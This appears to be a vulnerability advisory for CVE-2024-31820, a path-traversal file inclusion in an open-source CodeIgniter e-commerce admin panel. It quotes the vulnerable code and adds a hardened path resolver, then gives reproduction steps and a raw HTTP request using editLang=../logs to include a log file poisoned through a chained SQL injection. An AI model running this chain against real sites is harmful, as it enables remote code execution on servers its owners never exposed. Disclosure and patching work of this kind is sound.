
@LioTree
Created April 28, 2024 12:43
CVE-2024-31820

vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)

version: all versions before commit d22b54e ("Vulnerability fixes from Lion Tree") of kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)

A file inclusion vulnerability exists in the getLangFolderForEdit method of application/modules/admin/controllers/advanced_settings/Languages.php. The value of $_GET['editLang'] is concatenated into a directory path without any sanitization, so an attacker who controls it can make the server require every .php file found under a directory of their choosing (reached by path traversal from application/language/). The only guard is a database lookup that checks whether a language with that name exists, which an attacker satisfies by first creating a language named ../logs. Chained with CVE-2024-31821 (SQL injection) to write malicious PHP code into the log file log-xxxx.php under application/logs/, this lets the attacker include that log file. Because BASEPATH is already defined when the require happens, the `defined('BASEPATH') OR exit(...)` guard at the beginning of the CodeIgniter log file does not stop execution, and the result is remote code execution.

// application/modules/admin/controllers/advanced_settings/Languages.php
// $_GET['editLang'] is concatenated into the directory path unsanitized, and
// every .php file found there is passed to require.
private function getLangFolderForEdit()
{
    $langFiles = array();
    $files = rreadDir('application' . DIRECTORY_SEPARATOR . 'language' . DIRECTORY_SEPARATOR . '' . $_GET['editLang'] . DIRECTORY_SEPARATOR);
    $arrPhpFiles = $arrJsFiles = array();
    foreach ($files as $ext => $filesLang) {
        foreach ($filesLang as $fileLang) {
            if ($ext == 'php') {
                require $fileLang; // file inclusion sink
                if (isset($lang)) {
                    $arrPhpFiles[$fileLang] = $lang;
                    unset($lang);
                }
            }
            if ($ext == 'js') {
                $jsTrans = file_get_contents($fileLang);
                preg_match_all('/(.+?)"(.+?)"/', $jsTrans, $PMA);
                $arrJsFiles[$fileLang] = $PMA;
                unset($PMA);
            }
        }
    }
    $langFiles[0] = $arrPhpFiles;
    $langFiles[1] = $arrJsFiles;
    return $langFiles;
}

// Caller in the same controller: the only guard before the include is that a
// language row with this name exists in the database.
if (isset($_GET['editLang'])) {
    $num = $this->Languages_model->countLangs($_GET['editLang']);
    if ($num == 0) {
        redirect('admin/languages');
    }
    $langFiles = $this->getLangFolderForEdit();
}

// Languages_model: a name lookup, not a path check. A language named
// "../logs" satisfies it.
public function countLangs($name = null, $abbr = null)
{
    if ($name != null) {
        $this->db->where('name', $name);
    }
    if ($abbr != null) {
        $this->db->or_where('abbr', $abbr);
    }
    return $this->db->count_all_results('languages');
}
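The following is an added example and not code from the Ecommerce-CodeIgniter-Bootstrap project: it reproduces the unsafe concatenation above against a constructed directory layout to show that `../logs` escapes application/language/, and puts a hardened resolver beside it. The function name safeLangDir(), the allow-list pattern and the temporary directory layout are assumptions made for this demonstration.

```php
<?php
// Added example, not the project's code. safeLangDir() and the directory
// layout created below are assumptions for this demonstration.

declare(strict_types=1);

/**
 * Resolve the language directory for $editLang, or return null if the name
 * is not an acceptable language identifier or resolves outside $baseDir.
 *
 * Two independent checks, so a bug in one does not reopen the hole:
 *  1. a syntactic allow-list (letters, digits, '_' and '-' only), which
 *     rejects "../logs" before the filesystem is touched;
 *  2. a realpath() containment check: the canonical directory must lie
 *     strictly inside the canonical base directory.
 */
function safeLangDir(string $baseDir, string $editLang): ?string
{
    if (preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $editLang) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $editLang);
    if ($candidate === false || !is_dir($candidate)) {
        return null;
    }
    // Compare with the separator appended, so that a sibling directory such
    // as "language2" is not accepted as being inside "language".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed layout mirroring application/language and application/logs,
// created under the system temp directory for this demo only.
$root     = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ci_lang_demo_' . bin2hex(random_bytes(4));
$langBase = $root . DIRECTORY_SEPARATOR . 'application' . DIRECTORY_SEPARATOR . 'language';
$logsDir  = $root . DIRECTORY_SEPARATOR . 'application' . DIRECTORY_SEPARATOR . 'logs';
mkdir($langBase . DIRECTORY_SEPARATOR . 'english', 0700, true);
mkdir($logsDir, 0700, true);

// The original concatenation from getLangFolderForEdit(), fed the value used
// in the advisory: it resolves to the logs directory.
$unsafe = $langBase . DIRECTORY_SEPARATOR . '' . '../logs' . DIRECTORY_SEPARATOR;
printf("unsafe concatenation resolves to application/logs: %s\n",
    realpath($unsafe) === realpath($logsDir) ? 'yes' : 'no');

// The hardened resolver on a legitimate name and on traversal attempts.
// The NUL-byte case shows why the syntactic check runs first: PHP 8
// filesystem functions throw a ValueError on embedded NUL bytes.
foreach (['english', '../logs', 'english/../../logs', "english\0"] as $name) {
    $result = safeLangDir($langBase, $name);
    printf("safeLangDir(%-22s) -> %s\n",
        addcslashes($name, "\0..\37"), $result === null ? 'rejected' : $result);
}

// Remove the constructed layout.
rmdir($langBase . DIRECTORY_SEPARATOR . 'english');
rmdir($langBase);
rmdir($logsDir);
rmdir(dirname($langBase));
rmdir($root);
```

The same allow-list belongs on the path that stores language names (the admin form used in step 1 below), because the exploit chain depends on a language named `../logs` being accepted into the database in the first place; countLangs() confirms that a row exists, which says nothing about where the name points on disk.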

The steps to reproduce are as follows:

  • Add a new language named ../logs through the admin interface, so that countLangs('../logs') returns a non-zero count and the guard $num = $this->Languages_model->countLangs($_GET['editLang']); is satisfied.

  • Use the SQL injection vulnerability (CVE-2024-31821) to write malicious PHP code into the log file. This step must come after the first one, because adding a language clears the log file.

  • Edit the language ../logs by requesting the languages page with editLang=../logs, which includes the log file:

GET /Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=../logs HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/languages
Cookie: ci_session=inm96ingrq5a7murjrsmvjc7o7ke83jg; shopping_cart=a%3A1%3A%7Bi%3A0%3Bi%3A2%3B%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

